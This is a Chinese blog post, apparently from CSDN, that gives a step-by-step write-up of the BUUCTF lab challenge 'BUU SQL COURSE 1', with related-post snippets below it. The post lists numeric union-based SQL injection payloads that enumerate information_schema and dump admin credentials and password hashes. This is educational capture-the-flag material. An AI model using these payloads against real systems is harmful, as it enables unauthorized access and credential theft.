Buuctf | BUU SQL COURSE 1

最新推荐文章于 2025-06-16 20:19:15 发布
原创 最新推荐文章于 2025-06-16 20:19:15 发布 · 8.3k 阅读 · 45 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #database

本文详述了一次针对Buuctf平台的SQL注入攻击过程,重点在于利用304跳转后的content_detail.php页面进行数字注入。通过探测、判断数据库结构和查询敏感数据,最终获取了数据库名news、表名admin及字段信息,成功得到用户名和密码,实现了登录并获得flag。该实例展示了SQL注入在非登录界面的运用和数字注入的常规步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Buuctf |BUU SQL COURSE 1

一、题目链接

https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201

二、实战化演练

1.直接使用弱口令来进行测试

在这里插入图片描述
2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转
在这里插入图片描述
3.通过访问backend/content_detail.php?id=1

在这里插入图片描述
4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句

1 and 1=1

在这里插入图片描述
5.我们尝试使用

1 and 1=2

没有任何的回显
在这里插入图片描述
6.判断or是否被过滤

1 or 1=1

在这里插入图片描述
7.判断列数

1 order by 1,2,3

3的时候没有回显,1,2有回显,说明有2
在这里插入图片描述
8.判断显位点

?id=-1 union select 1,2

在这里插入图片描述
9.爆破数据库

?id=-1 union select 1,database()

在这里插入图片描述
10.得到数据库库名news,获取数据表信息

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='news')

在这里插入图片描述
11.得到表名信息admin,contents,使用admin表,获取字段名信息

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='admin')

在这里插入图片描述
12.得到字段名分别是id,username,password,获取username的信息

?id=-1 union select 1,(select group_concat(username) from admin)

在这里插入图片描述
13.获取password的信息

?id=-1 union select 1,(select group_concat(password) from admin)

在这里插入图片描述
14.通过上述SQL注入可以得到用户名和密码

admin
dba223cce96cb458550d0d195bdb2386

15.此时在登录框中输入其用户名和密码,即可得到flag
在这里插入图片描述

三、ps

1.本道题目的新颖之处在于,使用的SQL注入的点,并不是登录界面,而是使用的是304跳转之后的网站;
2.本道题目属于数字注入,比较常规,关键在于能找到注入点

[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 988
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 942
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 607
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
BUUCTF Basic 解题记录--BUU SQL COURSE 1
最新发布
ztf180的博客
06-16 266
或F12快捷键),看到如下语句,将下图中的url地址(红色框中包含id=1的内容)作为sqlmap的参数执行下面的命令。靶站网页页面很简约 找到登录页面首先先试试常用username,password发现登录失败。可以看到数据库名称如上,news感觉可能有我们需要的内容,先查看news中的表。点击第一个热点页面,查看开发者模式(浏览器右上角的三个竖点->更多工具->考虑使用sqlmap工具进行爆库。dump admin表中的值。查数据库news中的数据表。查数据表admin的内容。发现admin数据表。
BUUCTFBUU SQL COURSE 1 1
qq_41369524的博客
12-10 2945
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
BUUCTFBUU SQL COURSE 1
weixin_63442046的博客
04-28 3090
关于BUU SQL COURSE 1的思路
BUU SQL COURSE 1
qq_62984336的博客
03-23 1933
BUU SQL COURSE 1 1.打开每一个网页都遛了一遍,没发现什么,但是在f12的网络里找到了端倪,明显是个注入点 2.访问页面后开始注入(注意要把#的地方换成backend查看后台数据,不然可能看不到回显) 先测试回显位置 id=1 order by 1 id=1 order by 2 id=1 order by 3//开始没有回显 然后开始注入 ?id=0 union select 1,group_concat(table_name) from informatio.
网络安全最新BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误,天呐
2401_84254087的博客
05-15 306
通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。然后我们构造order by sql语句验证该数据表中共有几列数据,当我们order by 3时,列表为空,而order by 2时,列表有数据,则证明该数据表中只有两列。根据数据库名,我们可以在源数据库information_schema中查到该数据库的所有表名,当前查到一共两张表,admin和contents表。
2025.1.21——六、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建
2402_87387800的博客
01-23 2331
题目来源:buuctf BUU XSS COURSE 1
BUU SQL COURSE 1 1SQL注入)
小谢的博客
10-25 5006
BUU SQL COURSE 1 1SQL注入)题解
【CTF练习】BUU SQL COURSE 1
m0_73866435的博客
01-30 961
首先根据题目sql,那么我想着肯定考的是sql注入吧,那么页面显示有4个可点击,
BUUCTF BUU SQL COURSE 1_buuctf buu sql course 1
2401_84968504的博客
05-16 404
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUU SQL COURSE 1 1
oJiuJieZhong的博客
10-20 1497
http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,group_concat%28schema_name%29%20from%20information_schema.schemata--+ http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backe.
BUU SQL COURSE 2
08-31
BUU SQL COURSE 2可能是针对SQL技能提升的课程,但具体内容无法得知,因为没有具体的信息提供。通常这类课程会覆盖SQL的高级知识点,比如事务处理、存储过程、触发器、高级查询技巧、性能优化、索引的使用等。学习这类课程可以帮助数据库管理员、数据分析师以及程序员等提升对SQL语言的掌握能力,进而更高效地管理数据库和开发应用程序。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值